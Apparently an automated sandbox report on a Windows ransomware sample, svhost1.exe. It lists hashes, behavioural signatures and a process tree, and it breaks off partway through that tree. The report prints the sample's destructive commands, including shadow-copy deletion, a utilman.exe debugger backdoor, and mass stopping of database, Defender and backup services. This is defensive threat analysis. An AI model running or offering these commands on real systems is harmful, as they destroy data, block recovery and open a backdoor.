Analysis

- max time kernel: 66s
- max time network: 48s
- platform: windows10_x64
- resource: win10v200430
- submitted: 09-05-2020 18:48

Static task: static1

Behavioral task: behavioral1
  Sample: svhost1.exe
  Resource: win7v200430

Behavioral task: behavioral2
  Sample: svhost1.exe
  Resource: win10v200430

General

- Target: svhost1.exe
- Size: 2.8MB
- MD5: 0527539f8c9af38ea8c36e9d2be595cd
- SHA1: a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
- SHA256: 247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
- SHA512: 00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Malware Config
Signatures

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Suspicious use of WriteProcessMemory (94 IoCs)
  Processes: svhost1.exe, powershell.exe, powershell.exe
  description | pid | process | target process
  PID 664 wrote to memory of 868 | 664 | svhost1.exe | powershell.exe
  PID 664 wrote to memory of 868 | 664 | svhost1.exe | powershell.exe
  PID 868 wrote to memory of 1080 | 868 | powershell.exe | net.exe
  PID 868 wrote to memory of 1080 | 868 | powershell.exe | net.exe
  PID 664 wrote to memory of 2092 | 664 | svhost1.exe | powershell.exe
  PID 664 wrote to memory of 2092 | 664 | svhost1.exe | powershell.exe
  PID 2092 wrote to memory of 3712 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3712 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3180 | 2092 | powershell.exe | vssadmin.exe
  PID 2092 wrote to memory of 3180 | 2092 | powershell.exe | vssadmin.exe
  PID 2092 wrote to memory of 1872 | 2092 | powershell.exe | reg.exe
  PID 2092 wrote to memory of 1872 | 2092 | powershell.exe | reg.exe
  PID 2092 wrote to memory of 1912 | 2092 | powershell.exe | reg.exe
  PID 2092 wrote to memory of 1912 | 2092 | powershell.exe | reg.exe
  PID 2092 wrote to memory of 3528 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3528 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3328 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3328 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2272 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2272 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 496 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 496 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3648 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3648 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3800 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3800 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1080 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1080 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2860 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2860 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 732 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 732 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2108 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2108 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3552 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3552 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 276 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 276 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3888 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3888 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3540 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3540 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1836 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1836 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2252 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2252 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3052 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3052 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 508 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 508 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3996 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3996 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3992 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 3992 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2220 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 2220 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 992 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 992 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1060 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1060 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1800 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1800 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1008 | 2092 | powershell.exe | WMIC.exe
  PID 2092 wrote to memory of 1008 | 2092 | powershell.exe | WMIC.exe

- Runs net.exe

- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe
  pid | process
  3180 | vssadmin.exe

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  868 | powershell.exe
  868 | powershell.exe
  868 | powershell.exe
  2092 | powershell.exe
  2092 | powershell.exe
  2092 | powershell.exe

- Sets file execution options in registry (2 TTPs, 4 IoCs)
  Processes: reg.exe, reg.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe" | reg.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe | reg.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled" | reg.exe

- Drops desktop.ini file(s) (3 IoCs)
  Processes: svhost1.exe
  description | ioc | process
  File opened for modification | C:\Program Files\desktop.ini | svhost1.exe
  File opened for modification | C:\Program Files (x86)\desktop.ini | svhost1.exe
  File opened for modification | C:\$Recycle.Bin\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini | svhost1.exe

- Suspicious use of AdjustPrivilegeToken (1643 IoCs)
  Processes: powershell.exe, powershell.exe, WMIC.exe, vssvc.exe, WMIC.exe
  description | pid | process
  Token: SeDebugPrivilege | 868 | powershell.exe
  Token: SeDebugPrivilege | 2092 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3712 | WMIC.exe
  Token: SeSecurityPrivilege | 3712 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3712 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3712 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3712 | WMIC.exe
  Token: SeSystemtimePrivilege | 3712 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3712 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3712 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3712 | WMIC.exe
  Token: SeBackupPrivilege | 3712 | WMIC.exe
  Token: SeRestorePrivilege | 3712 | WMIC.exe
  Token: SeShutdownPrivilege | 3712 | WMIC.exe
  Token: SeDebugPrivilege | 3712 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 3712 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 3712 | WMIC.exe
  Token: SeUndockPrivilege | 3712 | WMIC.exe
  Token: SeManageVolumePrivilege | 3712 | WMIC.exe
  Token: 33 | 3712 | WMIC.exe
  Token: 34 | 3712 | WMIC.exe
  Token: 35 | 3712 | WMIC.exe
  Token: 36 | 3712 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 3712 | WMIC.exe
  Token: SeSecurityPrivilege | 3712 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3712 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3712 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3712 | WMIC.exe
  Token: SeSystemtimePrivilege | 3712 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3712 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3712 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3712 | WMIC.exe
  Token: SeBackupPrivilege | 3712 | WMIC.exe
  Token: SeRestorePrivilege | 3712 | WMIC.exe
  Token: SeShutdownPrivilege | 3712 | WMIC.exe
  Token: SeDebugPrivilege | 3712 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 3712 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 3712 | WMIC.exe
  Token: SeUndockPrivilege | 3712 | WMIC.exe
  Token: SeManageVolumePrivilege | 3712 | WMIC.exe
  Token: 33 | 3712 | WMIC.exe
  Token: 34 | 3712 | WMIC.exe
  Token: 35 | 3712 | WMIC.exe
  Token: 36 | 3712 | WMIC.exe
  Token: SeBackupPrivilege | 3340 | vssvc.exe
  Token: SeRestorePrivilege | 3340 | vssvc.exe
  Token: SeAuditPrivilege | 3340 | vssvc.exe
  Token: SeIncreaseQuotaPrivilege | 3528 | WMIC.exe
  Token: SeSecurityPrivilege | 3528 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 3528 | WMIC.exe
  Token: SeLoadDriverPrivilege | 3528 | WMIC.exe
  Token: SeSystemProfilePrivilege | 3528 | WMIC.exe
  Token: SeSystemtimePrivilege | 3528 | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 3528 | WMIC.exe
  Token: SeIncBasePriorityPrivilege | 3528 | WMIC.exe
  Token: SeCreatePagefilePrivilege | 3528 | WMIC.exe
  Token: SeBackupPrivilege | 3528 | WMIC.exe
  Token: SeRestorePrivilege | 3528 | WMIC.exe
  Token: SeShutdownPrivilege | 3528 | WMIC.exe
  Token: SeDebugPrivilege | 3528 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 3528 | WMIC.exe
  Token: SeRemoteShutdownPrivilege | 3528 | WMIC.exe
  Token: SeUndockPrivilege | 3528 | WMIC.exe
  Token: SeManageVolumePrivilege | 3528 | WMIC.exe

- Drops file in Windows directory (44 IoCs)
  Processes: svhost1.exe
  description | ioc | process
  File created | C:\Windows\DtcInstall.log_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\setupact.log_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\win.ini_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\WindowsUpdate.log | svhost1.exe
  File opened for modification | C:\Windows\write.exe | svhost1.exe
  File opened for modification | C:\Windows\bfsvc.exe | svhost1.exe
  File created | C:\Windows\bootstat.dat_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\splwow64.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\twain_32.dll | svhost1.exe
  File created | C:\Windows\explorer.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\Professional.xml | svhost1.exe
  File opened for modification | C:\Windows\PFRO.log | svhost1.exe
  File opened for modification | C:\Windows\regedit.exe | svhost1.exe
  File opened for modification | C:\Windows\splwow64.exe | svhost1.exe
  File created | C:\Windows\HelpPane.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\lsasetup.log_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\winhlp32.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\WMSysPr9.prx | svhost1.exe
  File opened for modification | C:\Windows\lsasetup.log | svhost1.exe
  File created | C:\Windows\PFRO.log_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\explorer.exe | svhost1.exe
  File opened for modification | C:\Windows\notepad.exe | svhost1.exe
  File created | C:\Windows\WindowsUpdate.log_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\DtcInstall.log | svhost1.exe
  File opened for modification | C:\Windows\HelpPane.exe | svhost1.exe
  File created | C:\Windows\mib.bin_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\Professional.xml_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\win.ini | svhost1.exe
  File opened for modification | C:\Windows\WindowsShell.Manifest | svhost1.exe
  File created | C:\Windows\bfsvc.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\bootstat.dat | svhost1.exe
  File created | C:\Windows\notepad.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\setupact.log | svhost1.exe
  File opened for modification | C:\Windows\hh.exe | svhost1.exe
  File opened for modification | C:\Windows\mib.bin | svhost1.exe
  File created | C:\Windows\system.ini_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\system.ini | svhost1.exe
  File created | C:\Windows\twain_32.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\WindowsShell.Manifest_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Windows\winhlp32.exe | svhost1.exe
  File created | C:\Windows\WMSysPr9.prx_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\hh.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\regedit.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Windows\write.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe

- Discovers systems in the same network (1 TTPs, 1 IoCs)

- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes: bcdedit.exe, bcdedit.exe
  pid | process
  408 | bcdedit.exe
  1060 | bcdedit.exe

- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe

- Drops file in Program Files directory (346 IoCs)
  Processes: svhost1.exe
  description | ioc | process
  File created | C:\Program Files\CompleteSuspend.rtf_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\7-Zip\readme.txt_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\crashreporter.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\UnprotectUnblock.gif_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Internet Explorer\sqmapi.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll | svhost1.exe
  File created | C:\Program Files\Windows Media Player\wmpshare.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\MpCmdRun.exe | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\MpAzSubmit.dll | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll | svhost1.exe
  File created | C:\Program Files\Windows Defender\MSASCuiL.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Windows Defender\MsMpLics.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\application.ini_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\IA2Marshal.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Microsoft Office\AppXManifest.xml_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Internet Explorer\ieinstal.exe | svhost1.exe
  File opened for modification | C:\Program Files\7-Zip\7-zip32.dll | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\platform.ini_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\LockTest.nfo | svhost1.exe
  File opened for modification | C:\Program Files\Windows Media Player\WMPMediaSharing.dll | svhost1.exe
  File opened for modification | C:\Program Files\Windows Media Player\WMPNSSUI.dll | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Windows Defender\MpRtp.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\SymSrv.dll | svhost1.exe
  File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\lgpllibs.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\libEGL.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\plugin-container.exe.sig | svhost1.exe
  File created | C:\Program Files\RedoImport.xla_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\AccessibleHandler.dll | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\install.log_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\libGLESv2.dll | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\MpSvc.dll | svhost1.exe
  File opened for modification | C:\Program Files\7-Zip\7-zip.dll | svhost1.exe
  File created | C:\Program Files\7-Zip\7z.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\dependentlibs.list | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Windows Defender\MpUXSrv.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\install.log | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\plugin-container.exe.sig_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files (x86)\desktop.ini | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\CompareHide.WTV_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\AmStatusInstall.mof | svhost1.exe
  File created | C:\Program Files\Windows Defender\MsMpEng.exe_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Internet Explorer\IEShims.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\ClientWMIInstall.mof | svhost1.exe
  File created | C:\Program Files\Windows Defender\ProtectionManagement.mof_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\d3dcompiler_47.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File created | C:\Program Files\Mozilla Firefox\freebl3.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\MpCommu.dll | svhost1.exe
  File opened for modification | C:\Program Files\Windows Defender\NisLog.dll | svhost1.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\default-browser-agent.exe | svhost1.exe
  File created | C:\Program Files\BackupProtect.kix_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
  File opened for modification | C:\Program Files\Internet Explorer\iexplore.exe | svhost1.exe
  File created | C:\Program Files\Windows Defender\EppManifest.dll_ID_625234068_[decryption@qbmail.biz].trix | svhost1.exe
Processes (indented by process tree depth)

C:\Users\Admin\AppData\Local\Temp\svhost1.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
  - Suspicious use of WriteProcessMemory
  - Drops desktop.ini file(s)
  - Drops file in Windows directory
  - Drops file in Program Files directory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    command line: powershell.exe -NoExit -Command -
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\net.exe (depth 3)
      command line: "C:\Windows\system32\net.exe" view
      - Discovers systems in the same network

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    command line: powershell.exe -NoExit -Command -
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\vssadmin.exe (depth 3)
      command line: "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
      - Interacts with shadow copies

    C:\Windows\system32\reg.exe (depth 3)
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
      - Sets file execution options in registry

    C:\Windows\system32\reg.exe (depth 3)
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
      - Sets file execution options in registry

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
